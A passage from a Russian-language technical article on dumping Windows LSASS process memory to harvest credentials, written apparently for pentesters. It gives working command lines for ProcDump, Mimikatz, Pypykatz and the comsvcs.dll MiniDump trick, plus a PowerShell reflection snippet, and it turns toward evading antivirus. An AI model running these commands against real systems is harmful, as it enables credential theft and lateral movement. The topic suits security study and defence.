\u0438\u0437 \u0441\u043e\u0441\u0442\u0430\u0432\u0430 <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/\">Windows Sysinternals<\/a>. \u042d\u0442\u043e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0434\u0430\u043c\u043f\u044b \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0441 \u0446\u0435\u043b\u044c\u044e \u0438\u0445 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430, \u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 lsass.exe \u0442\u043e\u043c\u0443 \u043d\u0435 \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 (\u0435\u0441\u043b\u0438 \u043f\u0440\u0430\u0432\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442, \u0440\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u0445\u0435-\u0445\u0435).<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>C:\\>procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/425\/4e0\/207\/4254e02070940222db4a4cdf39967abc.png\" alt=\"\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe\" title=\"\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe\" width=\"628\" height=\"313\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/425\/4e0\/207\/4254e02070940222db4a4cdf39967abc.png\"\/><figcaption>\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe<\/figcaption><\/figure>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0438\u0442\u0430\u0449\u0438\u0442\u044c \u0441\u043b\u0435\u043f\u043b\u0435\u043d\u043d\u044b\u0439 \u0434\u0430\u043c\u043f \u043a \u0441\u0435\u0431\u0435 \u043d\u0430 \u0442\u0430\u0447\u043a\u0443 \u0438 \u0440\u0430\u0441\u043f\u0430\u0440\u0441\u0438\u0442\u044c \u0435\u0433\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0442\u043e\u0433\u043e \u0436\u0435 Mimikatz.<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>C:\\>mimikatz.exe mimikatz # sekurlsa::minidump lsass.dmp mimikatz # sekurlsa::logonpasswords full mimikatz # exit  C:\\>mimikatz.exe \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonpasswords full\" \"exit\"<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2ac\/167\/ad8\/2ac167ad89e500aa5a6dbbb3259b555d.png\" alt=\"\u041f\u0430\u0440\u0441\u0438\u043c lsass.dmp \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Mimikatz\" title=\"\u041f\u0430\u0440\u0441\u0438\u043c lsass.dmp \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Mimikatz\" width=\"759\" height=\"663\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/2ac\/167\/ad8\/2ac167ad89e500aa5a6dbbb3259b555d.png\"\/><figcaption>\u041f\u0430\u0440\u0441\u0438\u043c lsass.dmp \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Mimikatz<\/figcaption><\/figure>\n<p>\u0418\u043b\u0438 \u0435\u0433\u043e \u0430\u043d\u0430\u043b\u043e\u0433\u0430 \u0434\u043b\u044f Linux \u2013 <a href=\"https:\/\/github.com\/skelsec\/pypykatz\">Pypykatz<\/a>.<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>~$ pypykatz lsa minidump lsass.dmp<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/de8\/b5e\/15f\/de8b5e15fd0937a09c158afa0f219421.png\" alt=\"\u041f\u0430\u0440\u0441\u0438\u043c lsass.dmp \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Pypykatz\" title=\"\u041f\u0430\u0440\u0441\u0438\u043c lsass.dmp \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Pypykatz\" width=\"1240\" height=\"888\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/de8\/b5e\/15f\/de8b5e15fd0937a09c158afa0f219421.png\"\/><figcaption>\u041f\u0430\u0440\u0441\u0438\u043c lsass.dmp \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Pypykatz<\/figcaption><\/figure>\n<p>\u041f\u0440\u0435\u043b\u0435\u0441\u0442\u044c \u044d\u0442\u043e\u0433\u043e \u043c\u0435\u0442\u043e\u0434\u0430 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u0441\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u0441\u043b\u0435\u043f\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 ProcDump, \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 Microsoft, \u0438 \u044d\u0442\u0438\u0447\u043d\u043e\u043c\u0443 \u0432\u0437\u043b\u043e\u043c\u0449\u0438\u043a\u0443 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0442\u0430\u0449\u0438\u0442\u044c \u043d\u0430 \u0445\u043e\u0441\u0442 \u043d\u0438\u043a\u0430\u043a\u043e\u0439 \u043c\u0430\u043b\u0432\u0430\u0440\u0438. \u041e\u0434\u043d\u0430\u043a\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0442\u043e\u0436\u0435 \u0434\u043e\u043b\u0433\u043e \u043d\u0435 \u0441\u0442\u043e\u044f\u043b\u0438 \u0432 \u0441\u0442\u043e\u0440\u043e\u043d\u0435 \u0438 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u043a\u0440\u044b\u043b\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u0435\u043b\u0430\u0442\u044c \u0434\u0430\u043c\u043f\u044b LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ProcDump, \u0432\u043a\u043b\u044e\u0447\u0438\u0432 \u0435\u0433\u043e \u0432 \u0440\u0430\u0437\u0440\u044f\u0434 <code>PDM:HackTool.Win32.CreDump.rbaa<\/code>.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c04\/b6e\/ca8\/c04b6eca8efe64cfc853c95f48422e1e.png\" alt=\"\u00ab\u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u0438\u0439\u00bb \u043d\u0435 \u0434\u043e\u0432\u043e\u043b\u0435\u043d \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c\u044e ProcDump\" title=\"\u00ab\u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u0438\u0439\u00bb \u043d\u0435 \u0434\u043e\u0432\u043e\u043b\u0435\u043d \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c\u044e ProcDump\" width=\"874\" height=\"188\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/c04\/b6e\/ca8\/c04b6eca8efe64cfc853c95f48422e1e.png\"\/><figcaption>\u00ab\u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u0438\u0439\u00bb \u043d\u0435 \u0434\u043e\u0432\u043e\u043b\u0435\u043d \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c\u044e ProcDump<\/figcaption><\/figure>\n<h3>comsvcs.dll<\/h3>\n<p>\u0411\u0435\u0437\u0443\u0441\u043b\u043e\u0432\u043d\u043e, \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u043d\u0430\u0445\u043e\u0434\u043a\u043e\u0439 \u0441\u0442\u0430\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <strong>MiniDumpW<\/strong> \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 <code>C:\\Windows\\System32\\comsvcs.dll<\/code>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u0435\u0440\u0433\u0430\u0435\u0442 \u0432\u044b\u0437\u043e\u0432 Win32 API <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/minidumpapiset\/nf-minidumpapiset-minidumpwritedump\">MiniDumpWriteDump<\/a> \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043b\u0435\u043f\u043a\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u0438 <a href=\"https:\/\/lolbas-project.github.io\/#\">Living Off The Land Binaries And Scripts<\/a> (LOLBAS), \u043a\u043e\u0433\u0434\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u0438\u043d\u043e\u0441\u0438\u0442\u044c \u043d\u0438\u0447\u0435\u0433\u043e \u043b\u0438\u0448\u043d\u0435\u0433\u043e \u043d\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ebd\/e6b\/327\/ebde6b327c908cad4152b2c8496752f8.png\" alt=\"\u0410\u043d\u0430\u043b\u0438\u0437 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 comsvcs.dll \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e PE-bear\" title=\"\u0410\u043d\u0430\u043b\u0438\u0437 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 comsvcs.dll \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e PE-bear\" width=\"1027\" height=\"684\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/ebd\/e6b\/327\/ebde6b327c908cad4152b2c8496752f8.png\"\/><figcaption>\u0410\u043d\u0430\u043b\u0438\u0437 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 comsvcs.dll \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e PE-bear<\/figcaption><\/figure>\n<p>\u042d\u0442\u0430 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u043b\u0435\u0433\u043b\u0430 \u0432 \u043e\u0441\u043d\u043e\u0432\u0443 \u043f\u0435\u0440\u0432\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u044b <a href=\"https:\/\/github.com\/Hackndo\/lsassy\">lsassy<\/a>, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043b\u0435\u043f\u043a\u0438 LSASS \u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0447\u0438\u0442\u0430\u0442\u044c \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u0430\u043c\u043f\u0430, \u0430 \u043d\u0435 \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0435\u0433\u043e \u0446\u0435\u043b\u0438\u043a\u043e\u043c \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e (\u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u043e \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0435 \u0440\u0430\u0431\u043e\u0442\u044b \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c <a href=\"https:\/\/en.hackndo.com\/remote-lsass-dump-passwords\/\">\u0432 \u0431\u043b\u043e\u0433\u0435<\/a> \u0430\u0432\u0442\u043e\u0440\u0430 \u0443\u0442\u0438\u043b\u0438\u0442\u044b).<\/p>\n<p>\u0415\u0441\u043b\u0438 \u0432\u0437\u0433\u043b\u044f\u043d\u0443\u0442\u044c <a href=\"https:\/\/github.com\/Hackndo\/lsassy\/blob\/f72eeb9eeeb22a37d6c94c6460fe7740e5e709ae\/lsassy\/dumpmethod\/comsvcs.py#L9-L14\">\u043d\u0430 \u043a\u043e\u0434<\/a>, \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0441\u0443\u043f\u0435\u0440\u0441\u043a\u0438\u0435 \u00ab\u043e\u0434\u043d\u043e\u0441\u0442\u0440\u043e\u0447\u043d\u0438\u043a\u0438\u00bb \u0434\u043b\u044f Cmd \u0438 PowerShell, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u0438 \u0441\u0434\u0430\u043c\u043f\u0438\u0442\u044c \u0435\u0433\u043e \u043f\u0430\u043c\u044f\u0442\u044c \u043f\u043e \u0437\u0430\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u0443\u0442\u0438.<\/p>\n<pre><code>C:\\>for \/f \"tokens=1,2 delims= \" ^%A in ('\"tasklist \/fi \"Imagename eq lsass.exe\" | find \"lsass\"\"') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B C:\\lsass.dmp full PS C:\\> rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\\lsass.dmp full<\/code><\/pre>\n<blockquote>\n<p>\u041f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u0435: \u043b\u0443\u0447\u0448\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f PowerShell-\u0432\u0435\u0440\u0441\u0438\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u0442\u0430\u043a \u043a\u0430\u043a \u0434\u043b\u044f \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 PowerShell \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0438 \u043e\u0442 Cmd \u043f\u043e \u0434\u0435\u0444\u043e\u043b\u0442\u0443 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f <code>SeDebugPrivilege<\/code> \u0434\u043b\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0435\u0441\u0441\u0438\u0438 \u0448\u0435\u043b\u043b\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043f\u0430\u043c\u044f\u0442\u0438 lsass.exe.<\/p>\n<\/blockquote>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/807\/414\/f6b\/807414f6ba5d6e6e83a132eb19961e1d.png\" alt=\"\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e LOLBAS-\u0442\u0435\u0445\u043d\u0438\u043a\u0438 comsvcs.dll\" title=\"\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e LOLBAS-\u0442\u0435\u0445\u043d\u0438\u043a\u0438 comsvcs.dll\" width=\"777\" height=\"323\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/807\/414\/f6b\/807414f6ba5d6e6e83a132eb19961e1d.png\"\/><figcaption>\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e LOLBAS-\u0442\u0435\u0445\u043d\u0438\u043a\u0438 comsvcs.dll<\/figcaption><\/figure>\n<p>\u0421\u0442\u043e\u0438\u0442 \u043b\u0438 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c, \u0447\u0442\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0434\u0430\u043c\u043f\u0430 \u043f\u043e \u0442\u0430\u043a\u043e\u0439 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u043a\u0435, \u0440\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u043e \u0445\u043e\u0442\u044f \u0431\u044b \u043c\u0430\u043b\u043e-\u043c\u0430\u043b\u044c\u0441\u043a\u0438 \u043d\u0435\u0440\u0430\u0432\u043d\u043e\u0434\u0443\u0448\u043d\u044b\u043c \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043e\u043c?<\/p>\n<h3>Out-Minidump.ps1<\/h3>\n<p>\u0415\u0449\u0435 \u043e\u0434\u0438\u043d \u0434\u0440\u0435\u0432\u043d\u0438\u0439 \u043a\u0430\u043a \u043c\u0438\u0440 \u0441\u043f\u043e\u0441\u043e\u0431 \u2014 \u043f\u043e\u0437\u0430\u0438\u043c\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c <a href=\"http:\/\/www.pinvoke.net\/default.aspx\/dbghelp\/MiniDumpWriteDump.html\">\u0438\u043c\u043f\u043e\u0440\u0442 P\/Invoke<\/a> \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MiniDumpWriteDump \u0438\u0437 \u043a\u043b\u0430\u0441\u0441\u0430 <strong>NativeMethods<\/strong> \u0441\u0431\u043e\u0440\u043a\u0438 <code>System.Management.Automation.WindowsErrorReporting<\/code>, \u043a\u0430\u043a \u044d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043a\u0440\u0438\u043f\u0442\u0435 <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Exfiltration\/Out-Minidump.ps1\">Out-Minidump.ps1<\/a> \u0438\u0437 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0430 PowerSploit.<\/p>\n<details class=\"spoiler\">\n<summary>MiniDumpWriteDump<\/summary>\n<div class=\"spoiler__content\">\n<pre><code class=\"powershell\">$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWriteDump<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/177\/7b4\/756\/1777b47560ec01acfef7f6f1584be3e6.png\" alt=\"\u0410\u043d\u0430\u043b\u0438\u0437 \u0441\u0431\u043e\u0440\u043a\u0438 System.Management.Automation.WindowsErrorReporting \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e dnSpy\" title=\"\u0410\u043d\u0430\u043b\u0438\u0437 \u0441\u0431\u043e\u0440\u043a\u0438 System.Management.Automation.WindowsErrorReporting \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e dnSpy\" width=\"1500\" height=\"944\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/177\/7b4\/756\/1777b47560ec01acfef7f6f1584be3e6.png\"\/><figcaption>\u0410\u043d\u0430\u043b\u0438\u0437 \u0441\u0431\u043e\u0440\u043a\u0438 System.Management.Automation.WindowsErrorReporting \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e dnSpy<\/figcaption><\/figure>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u0435\u043d \u0432\u044b\u0437\u043e\u0432\u0443 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MiniDump \u0438\u0437 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u043c\u0435\u0442\u043e\u0434\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0441\u0442\u0430\u0432\u043b\u044e \u044d\u0442\u043e \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0443\u043f\u0440\u0430\u0436\u043d\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0447\u0438\u0442\u0430\u0442\u0435\u043b\u044f. \u041d\u0443 \u0438, \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u044b \u0442\u0430\u043a \u0436\u0435 \u043d\u0435\u0433\u0430\u0442\u0438\u0432\u043d\u043e \u043a \u043d\u0435\u043c\u0443 \u043e\u0442\u043d\u043e\u0441\u044f\u0442\u0441\u044f.<\/p>\n<h2>\u0414\u0430\u043c\u043f\u0438\u043c LSASS \u043f\u043e OPSEC-\u043e\u0432\u0441\u043a\u0438<\/h2>\n<p>\u0418\u0442\u0430\u043a, \u043f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u043a \u0441\u0430\u043c\u043e\u043c\u0443 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u043c\u0443: \u043a\u0430\u043a \u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u00ab\u0443\u0433\u043e\u0434\u0438\u0442\u044c\u00bb \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0434\u0430\u043c\u043f \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u0432 \u0441\u0442\u0438\u043b\u0435 Operational Security?<\/p>\n<p>\u0417\u0430\u043f\u0440\u0435\u0442\u044b AV \u043d\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u043b\u0435\u043f\u043a\u043e\u0432 \u043f\u0430\u043c\u044f\u0442\u0438 LSASS \u0443\u0441\u043b\u043e\u0432\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0440\u0430\u0437\u0434\u0435\u043b\u0438\u0442\u044c \u043d\u0430 3 \u0447\u0430\u0441\u0442\u0438:<\/p>\n<ol>\n<li>\n<p>\u0417\u0430\u043f\u0440\u0435\u0442 \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe.<\/p>\n<\/li>\n<li>\n<p>\u0417\u0430\u043f\u0440\u0435\u0442 \u043d\u0430 \u0447\u0442\u0435\u043d\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe.<\/p>\n<\/li>\n<li>\n<p>\u0417\u0430\u043f\u0440\u0435\u0442 \u043d\u0430 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0438\u0440\u0443\u044e\u0449\u0435\u0433\u043e \u0434\u0430\u043c\u043f\u0430 \u043d\u0430 \u0434\u0438\u0441\u043a.<\/p>\n<\/li>\n<\/ol>\n<p>\u041d\u0438\u0436\u0435 \u043c\u044b \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c 3 \u043f\u0440\u043e\u0435\u043a\u0442\u0430, \u043a\u0430\u0436\u0434\u044b\u0439 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 \u0441\u0432\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u043c\u043e\u0433\u0430\u043b \u043c\u043d\u0435 \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0443\u0437\u043b\u043e\u0432 \u043f\u0440\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u043c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435 KES \u043d\u0430 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0430\u0445 \u0438\u043b\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f\u0445 Red Team.<\/p>\n<h3>MirrorDump<\/h3>\n<p>\u041f\u0435\u0440\u0432\u044b\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u043c \u043c\u043d\u043e\u044e \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430 \u0443\u0434\u0438\u0432\u043b\u0435\u043d\u0438\u0435 \u043c\u043e\u0433 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u0437\u0430\u0449\u0438\u0442\u0443 KES, \u0431\u044b\u043b <a href=\"https:\/\/github.com\/CCob\/MirrorDump\">MirrorDump<\/a> \u043e\u0442 